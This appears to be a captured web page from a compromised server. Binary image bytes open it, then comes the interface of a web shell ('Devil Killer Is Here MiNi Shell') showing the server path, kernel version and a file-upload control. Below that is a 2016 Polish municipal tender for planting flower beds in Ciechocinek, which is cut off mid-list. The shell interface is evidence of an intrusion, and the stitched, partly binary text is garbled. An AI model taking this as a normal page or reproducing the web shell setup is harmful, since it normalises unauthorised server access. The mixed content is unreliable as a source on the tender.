JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160215/15433-N-2016.html

<p class="kh_header"><b>Ciechocinek: 1) dostawa roślin - kwiatów jednorocznych do obsadzeń rabat i dywanów  kwiatowych i konserwacja tych nasadzeń.  
2)  dostawa  roślin  dwuletnich do obsadzeń  rabat kwiatowych i konserwacja tych nasadzeń</b><br>
<b>Numer ogłoszenia: 15433 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Ciechocinek , ul. Kopernika 19, 87-720 Ciechocinek, woj. kujawsko-pomorskie, tel. 054 2836458, 4161800, faks 054 2836423.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciechocinek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1) dostawa roślin - kwiatów jednorocznych do obsadzeń rabat i dywanów  kwiatowych i konserwacja tych nasadzeń.  
2)  dostawa  roślin  dwuletnich do obsadzeń  rabat kwiatowych i konserwacja tych nasadzeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> AD1) Zakres nasadzeń obejmuje następujące rabaty:

1) Park Tężniowy
Narożnik ul. Tężniowa (skalniak)				36 m2	
Gazony ul. Tężniowa						2 m2	
Zegar kwiatowy							121 m2
Rabata przy pomniku Staszica					201 m2
2)Park Zdrojowy
Klomb                                                                                     432 m2
Rabaty wokół klombu  i przy kamiennym pawiu                  234,9 m2
Rabaty przed Muszlą Koncertową                                           54,0 m2
Kwietniki  koliste wzdłuż głównej alei                                    43,5 m2
Rabata przed  kręgielnią                                                             4,9 m2
Rzeźba kwiatowa  w kształcie  wiewiórki                                  5,0 m2
Rzeźba kwiatowa w kształcie pawia                                          5,0 m2
Rzeźba kwiatowa w kształcie łabędzia                                         5,0 m
Rabata  przy fontannie ŻABKA                                               16,5 m2
3)Park Sosnowy
Gazony						             90 m2	
Rabaty 							 63 m2

4)Parter Hellwiga
a)Wazony kwiatowe Aleja AK					2 7 m2
b)Rabata przed budynkiem EUROPA			             96 m2	
c)Rabaty przy pergoli						 345 m2
d)Rabaty przy dywanie						 352 m2
e)2 rabaty przed fontanną					 208 m2
f)2 rabaty za fontanną						 246 m2
g)2 rabaty za ul. Raczyńskich					 156 m2
h)Dywan kwiatowy 2 części					 172 m2	
i)2 rabaty przy wejściu do Łazienek nr 1			               12 m2
j)2 rabaty wokół fontanny Windsor                                            565 m2

5)Teren zielony od fontanny GRZYB do ul. 3 Maja
a)Wazony ul. Kościuszki - Kościuszki                                          70 m2  
b)Kalendarz kwiatowy						 27 m2	
c)Rabata na skwerze przy Dyr. PUC S.A.			 38 m2
d)Rabaty przy ul. 3 Maja					 145 m2	


6)Pasaż zieleńców od pomnika Traugutta do ul. Mickiewicza
a)Rabata przy pomniku Traugutta			               15 m2	
b)Rabaty przed kościołem				               101 m2
c) Rabata za ul. 3 Maja                                                                      29 m2
d)Rabata za kościołem						 146 m2

7)Pojedyncze rabaty śródmiejskie
a)Rabata - rondo ul. Zdrojowa/Widok				 133 m2	
b)Rabata przy hali targowej					15 m2	
c)Rabata przy barze Tęcza					121 m2	
d)Rabata przy Urzędzie Miejskim			               29 m2	
e)Rabata przy przystanku PKS 					108 m2	
f)Rabaty przy fontannie GRZYB			               34 m2	
g)Rabaty wjazd z ul. Kopernika	z użyciem niskich  kwiatów	  91 m2
h)Rabaty ul. Narutowicza Kolejowa				106 m2
i)Rabata przy budynku Promocji					    3 m2
j)Rabata przy ulicy Mickiewicza					  35 m2
k)Rabata przy ulicy Warzelnianej			               32 m2
l)Zwisy  ulica Zdrojowa , Żelazna, Tężniowa ( 40 sztuk )		 24,5 m2

8)Obszar zieleńca za Teatrem Letnim
 Rabata przed Teatrem Letnim 					 85 m2
 Rabata od ul. Zdrojowej 					 39 m2
9) Plac Gdański 
  Rabata 						       420,00 m2
10)Teren zielony od ul  3 Maja
Wykonanie   rabat wraz z nawodnieniem przy pomniku 
dr Romana  Ignatowskiego                                                               4 m2
R a z e m   powierzchnia rabat	-			      5343,30 m2 

Utrzymanie i pielęgnacja rabat kwiatowych obsadzonych bylinami i różami w miejscach
Rabata za pomnikiem Traugutt - różanka	                                 370 m2


Szczegółowy zakres czynności objętych zamówieniem:
1)Użyźnianie podłoża.
2)Obsadzanie rabat materiałem własnym w I gatunku kwiatów. Rabaty takie  jak: dywan, zegar , kalendarz - obsadzenie z użyciem roślin w I  gatunku o małej intensywności wzrostu i krzewienia się z wymogiem  ilości kwiatów na 1 m2  od 150 do 200 sztuk przy użyciu wyłącznie następujących  gatunków roślin: ageratum tylko po obwodzie  przy trawniku, coleus w kolorach, echeveria - w kolorach, iresine, acharanthes, alternanthera - dwa rodzaje - czerwona zielona, selaginella, sedum, begonia  semperflorens w niewielkiej ilości ) 
3)Obsadzenia pozostałych rabat w I gatunku roślin w formie kompozycji dywanowych przyjmując zagęszczenie roślin  - 35 sztuk na 1m2 z  użyciem min. pelargonii rabatowej i begonii bulwiastej, gazanii.  
4) Przy obsadzaniu rabat wjazdów, skrzyżowań i rond, oraz w obszarze parterów Hellwiga przy murkach oporowych użycie wyłącznie niskich gatunków kwiatów  w tym  pelargonii rabatowej w minimalnej ilości łącznej 30 tyś sztuk całkowity zakaz użycia  canny,
5) obsadzenie zwisów ul. Zdrojowa, ul. Żelazna, ul. Tężniowa ( 40 sztuk ) wyłącznie pelargonią bluszczolistną ( pelargonium peltatum ), 
6) obsadzenie rabat w Parku Sosnowym o pow. 153m2  oraz rabat  za Teatrem Letnim o pow. 85 m2  i  39 m2  tuperhybridą ( begonią bulwiastą) przyjmując zagęszczenie 27 sztuk na 1m2,
7) obsadzenie rabat objętych przetargiem w I gatunku kwiatów następującymi gatunkami i w następujących wymaganych ilościach:
-  pelargonium ( pelargonia rabatowa ) - minimalna ilość 30 tys. sztuk,
- tuperhybrida ( begonia bulwiasta ) - minimalna ilość 40 tys. sztuk,
- sedum letnie  - minimalna ilość - 3 tys. sztuk
- pelargonia zwisająca                 - 1 tysiąc sztuk              
-  begonia dragon  - minimalna ilość 500 sztuk,
-  begonia semperflorens - minimalna ilość 40 tys. sztuk,
-  ageratum (żeniszek ) - minimalna ilość 35 tys. sztuk,
-  salvia splendens ( szałwia błyszcząca ) -  minimalna ilość 10 tys. sztuk,
- dalia figaro - minimalna ilość 15 tys. sztuk,
- mrozy - minimalna ilość 10 tyś sztuk
-  echeveria- minimalna ilość 25 tys. sztuk ,
-  acharanthes- minimalna ilość 10 tys. sztuk 
-  alternanthera - minimalna ilość 10 tys. sztuk,
-  iresine - minimalna ilość 10 tys. sztuk,
- chlorofytum ( zielistek) - minimalna ilość 20 tys. sztuk,
- tagetes ( turek ) - ilość około 10 tys. sztuk
- trawy ozdobne w odmianach  i kolorach minimalna ilość - 5 tyś sztuk
- prantus minimalna ilość sztuk 600
- pomea  minimalna ilość  sztuk 300
- surfinia mix  minimalna ilość 500 sztuk
- petunia mix minimalna ilość 5tyś. Sztuk
- pilea minimalna  ilość 5 tys. sztuk
- heliotrop minimalna ilość 3 tyś sztuk
8) Utrzymywanie i pielęgnacja rabat obsadzonych bylinami i różami.
9) Naprawa przy użyciu  własnych  materiałów obrzeży rabat.
10)  Wymiana uszkodzonych  palików wokół kalendarza kwiatowego.
11) Uzupełnienie  ziemi w rabatach : zegar kwiatowy, dywan kwiatowy, nowa rabata na zieleńcu za Teatrem Letnim, rabata  Plac Gdański. 
Dostawca we własnym zakresie i na własny koszt  uzupełniał będzie  ubytki w nasadzeniach  do 10 %  ogólnych nasadzeń .
Wyszczególnienie prac pielęgnacyjnych  wykonanych nasadzeń:
1) Odchwaszczanie, podlewanie, zasilanie rabat kwiatowych  zwalczanie chorób i szkodników przez cały okres wegetacji. 
2) Uprzątanie  roślin po zakończonej wegetacji nie wcześniej niż  koniec września 
3) Wywóz odpadów i  nieczystości na składowisko odpadów zebranych przy oczyszczaniu rabat i kwietników.
4) Wykonywanie codziennej aktualizacji daty na kalendarzu kwiatowym z użyciem materiału roślinnego.
5) Pielęgnacja istniejących rabat z nasadzeniem róż i bylin polegająca na bieżącej konserwacji i zwalczaniu  chorób i szkodników nawożeniu oraz zabezpieczaniu roślin na okresy zimowe.
6)Utrzymywanie i pielęgnacja oraz zabezpieczanie na okresy zimowe roślin stanowiących elementy rabat (agawa 2 szt.).
7)Utrzymywanie w stałej sprawności mechanizmu zegara kwiatowego.
8)Koszty za podlewanie rabat ponosi Urząd. 

Ad. B) Bieżące koszenie na wysokości 8 cm od gruntu trawników  przyległych do rabat, zbieranie i wywóz trawy - wg poniższego wykazu:

			     Pow. trawnika
1.)Parter Hellwiga
 dywan kwiatowy 2 części				           115 m2	
2.)Teren zielony od fontanny GRZYB do ul. 3 Maja
 rabata na skwerze przy Dyr. PUC			            70 m2	
3.)Pasaż zieleńców od ul. Traugutta do ul. Mickiewicza
a) rabata przy pomniku Traugutta			            66 m2		
b) rabata przed kościołem				           102,6 m2
d) rabata za kościołem 			                                     135,8 m2
4.)Pojedyncze rabaty śródmiejskie
a) rabata - rondo ul. Zdrojowa/Widok			             97 m2		
b) rabata przy Urzędzie Miejskim			             27 m2	
5)Plac Gdański
Rabata                                                                                             338 m2
6) Park Zdrojowy
   Klomb                                                                                         246 m2
R a z e m  powierzchnia trawników			         1197,40 m2 
Ad 2 Zakres nasadzeń jesiennych obejmuje następujące gazony i rabaty:   
      - GAZONY wszystkie pow. 108 m2 x 30 szt. kwiatów na 1 m2		 - 3240 szt.
RABATY przy pomniku Traugutta pow. 15 m2 x 19 szt. kwiatów na 1 m2-  285 szt.
RABATY  przy Urzędzie pow. 28m2 x 18 szt. kwiatów na 1m2               -  504 szt.
       -     GAZONY w Parku Sosnowym pow.19 m2 kwiatów na 1m2 19                  - 247 szt.
       -    RABATY wokół fontanny Windsor pow. 565 m2 x 19 szt kwiatów na 1m2 - 10735 szt.
      -    Rabata przy hali targowej    pow. 15 m2 x 19 szt kwiatów na 1 m2- 285 szt.. Szczegółowy zakres rzeczowy przedmiotu umowy obejmuje:
    - użyźnienie podłoża,
    - obsadzenie rabat  materiałem własnym w I wyborze bratki,
    - odchwaszczanie, podlewanie, zasilanie roślin,
    - ponoszenie kosztów zużycia wody do celów o których mowa wyżej,
    - wywóz  nieczystości pochodzących z oczyszczania  rabat i kwiatów  na składowisko odpadów							  
Termin wykonania  nasadzeń  15 .10.2016r  do 02.11.2016r
O terminie odbioru zakończenia nasadzeń i miejscu  powiadamia Wykonawca Zamawiającego z  dwudniowym wyprzedzeniem. W przypadku  nie przystąpienia 
Zamawiającego do czynności odbioru Wykonawca  dokonuje odbioru jednostronnie 
nie ponosząc odpowiedzialności za jakość nasadzeń
Wykonawca ponosi odpowiedzialność za wykonanie nasadzeń do 31.12.2016 roku..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 15000,00</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali przynajmniej jedno zamówienie polegające na   obsadzaniu   rabat kwiatami  o  powierzchni    5343,30 m2   (dotyczy każdego zamówienia)oraz koszeniu trawników  o powierzchni 1197,40 m2  (dotyczy każdego zamówienia)
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, że
dysponuje odpowiednim  potencjałem technicznym, tj. min. 3 kosiarkami, 3 wykaszarkami,  2 pojazdami transportowymi niezbędnymi do realizacji zamówienia
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, że
dysponuje odpowiednim potencjałem  kadrowym, tj. 5 pracowników posiadających umiejętności w zakresie realizacji prac będących przedmiotem zamówienia
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, że znajduje się w sytuacji finansowej i ekonomicznej zapewniającej wykonanie zamówienia: tj. wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 100.000,00zł 
Ocena spełnienia warunków wymaganych od Wykonawcy zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

